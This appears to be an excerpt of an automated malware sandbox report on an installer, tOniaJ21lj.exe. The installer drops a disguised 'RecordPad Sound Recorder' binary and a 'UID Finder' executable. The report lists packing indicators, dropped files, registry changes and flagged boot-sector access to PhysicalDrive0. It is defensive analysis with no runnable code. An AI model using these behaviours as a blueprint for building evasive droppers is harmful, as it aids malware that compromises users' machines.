                      Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpWindow found: window name: TMainFormJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: tOniaJ21lj.exeStatic file information: File size 4969628 > 1048576
                      Source: Binary string: msvcp120.amd64.pdb source: is-FR4FM.tmp.1.dr
                      Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: is-K3HBS.tmp.1.dr
                      Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb++ source: is-8ECK7.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtwinextras\lib\Qt5WinExtras.pdb.. source: is-RV2D1.tmp.1.dr
                      Source: Binary string: msvcr120.amd64.pdb source: is-C4R5U.tmp.1.dr
                      Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: is-EAHN0.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtwinextras\lib\Qt5WinExtras.pdb source: is-RV2D1.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Xml.pdb source: is-KI2RB.tmp.1.dr
                      Source: Binary string: C:\msys64\home\--\src\ffmpeg\libavdevice\avdevice-58.pdb source: is-JNDNQ.tmp.1.dr
                      Source: Binary string: C:\msys64\home\--\src\openh264-2.0.0_x64\openh264.pdb source: is-PRP4U.tmp.1.dr
                      Source: Binary string: C:\msys64\home\--\src\ffmpeg\libavdevice\avdevice-58.pdb## source: is-JNDNQ.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb** source: is-KU10K.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5OpenGL.pdb source: is-0C056.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5OpenGL.pdb33 source: is-0C056.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb source: is-KU10K.tmp.1.dr
                      Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb source: is-8ECK7.tmp.1.dr

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeUnpacked PE file: 3.2.recordpadsoundrecorder32.exe.400000.0.unpack .text:ER;.bhead8:R;.data:W;.rsrc:R;.chead8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeUnpacked PE file: 4.2.recordpadsoundrecorder32.exe.400000.0.unpack .text:ER;.bhead8:R;.data:W;.rsrc:R;.chead8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeUnpacked PE file: 3.2.recordpadsoundrecorder32.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeUnpacked PE file: 4.2.recordpadsoundrecorder32.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00447F60 LoadLibraryExA,LoadLibraryA,GetProcAddress,1_2_00447F60
                      Source: recordpadsoundrecorder32.exe.1.drStatic PE information: section name: .bhead8
                      Source: recordpadsoundrecorder32.exe.1.drStatic PE information: section name: .chead8
                      Source: is-UCHQL.tmp.1.drStatic PE information: section name: .vcp1208
                      Source: is-K3HBS.tmp.1.drStatic PE information: section name: .didat
                      Source: is-PRP4U.tmp.1.drStatic PE information: section name: .rodata
                      Source: is-VDBC5.tmp.1.drStatic PE information: section name: _RDATA
                      Source: UID Finder 6.11.66.exe.3.drStatic PE information: section name: .bhead8
                      Source: UID Finder 6.11.66.exe.3.drStatic PE information: section name: .chead8
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_00406518 push 00406555h; ret 0_2_0040654D
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_00408028 push ecx; mov dword ptr [esp], eax0_2_0040802D
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_00408E5C push 00408E8Fh; ret 0_2_00408E87
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004098B4 push 004098F1h; ret 1_2_004098E9
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00456228 push 00456260h; ret 1_2_00456258
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045C574 push ecx; mov dword ptr [esp], eax1_2_0045C579
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00410640 push ecx; mov dword ptr [esp], edx1_2_00410645
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0040A6C8 push esp; retf 1_2_0040A6D1
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0047E6EC push 0047E7CAh; ret 1_2_0047E7C2
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00412898 push 004128FBh; ret 1_2_004128F3
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004308A0 push ecx; mov dword ptr [esp], eax1_2_004308A5
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00442E74 push ecx; mov dword ptr [esp], ecx1_2_00442E78
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00450F04 push 00450F37h; ret 1_2_00450F2F
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0040CF98 push ecx; mov dword ptr [esp], edx1_2_0040CF9A
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0047323C push ecx; mov dword ptr [esp], edx1_2_0047323D
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0040F4F8 push ecx; mov dword ptr [esp], edx1_2_0040F4FA
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00457A94 push 00457AD8h; ret 1_2_00457AD0
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00419B98 push ecx; mov dword ptr [esp], ecx1_2_00419B9D
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0047FD40 push ecx; mov dword ptr [esp], ecx1_2_0047FD45
                      Source: recordpadsoundrecorder32.exe.1.drStatic PE information: section name: .text entropy: 7.764432846609721
                      Source: is-UCHQL.tmp.1.drStatic PE information: section name: .text entropy: 7.694137885769827
                      Source: UID Finder 6.11.66.exe.3.drStatic PE information: section name: .text entropy: 7.764432846609721

                      Persistence and Installation Behavior

                      barindex
                      Contains functionality to infect the boot sector
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_00401A4F
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive04_2_00401A4F
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive04_2_0260F851
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-RV2D1.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-6P98M.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_shfoldr.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5WinExtras.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Xml.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\avdevice-58.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-PRP4U.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-C4R5U.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libmp3lame.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\openh264.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5OpenGL.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-O2PKH.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcr120.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-FR4FM.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\unins000.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libeay32.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UTKLG.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_RegDLL.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp120.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libcurl.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-0C056.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KU10K.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-K3HBS.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeFile created: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KI2RB.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-8ECK7.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-VDBC5.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-EAHN0.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_iscrypt.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140_1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeFile created: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-JNDNQ.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\mousehelper.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Svg.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\QtAVWidgets1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeFile created: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exeJump to dropped file

                      Boot Survival

                      barindex
                      Contains functionality to infect the boot sector
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_00401A4F
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive04_2_00401A4F
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive04_2_0260F851
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 3_2_00402299 StartServiceCtrlDispatcherA,3_2_00402299
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423B7C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423B7C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0047E0A8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0047E0A8
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0042414C IsIconic,SetActiveWindow,SetFocus,1_2_0042414C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00424104 IsIconic,SetActiveWindow,1_2_00424104
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004182F4 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_004182F4
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004227CC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_004227CC
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00417508 IsIconic,GetCapture,1_2_00417508
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00417C40 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417C40
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00417C3E IsIconic,SetWindowPos,1_2_00417C3E
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0044B08C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044B08C
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_00401B4B
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_0260F955
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeWindow / User API: threadDelayed 9765Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-RV2D1.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-6P98M.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_shfoldr.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Xml.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5WinExtras.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\avdevice-58.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-PRP4U.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-C4R5U.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libmp3lame.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5OpenGL.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\openh264.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-O2PKH.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcr120.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-FR4FM.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libeay32.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\unins000.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UTKLG.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_RegDLL.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp120.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libcurl.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-0C056.tmpJump to dropped file
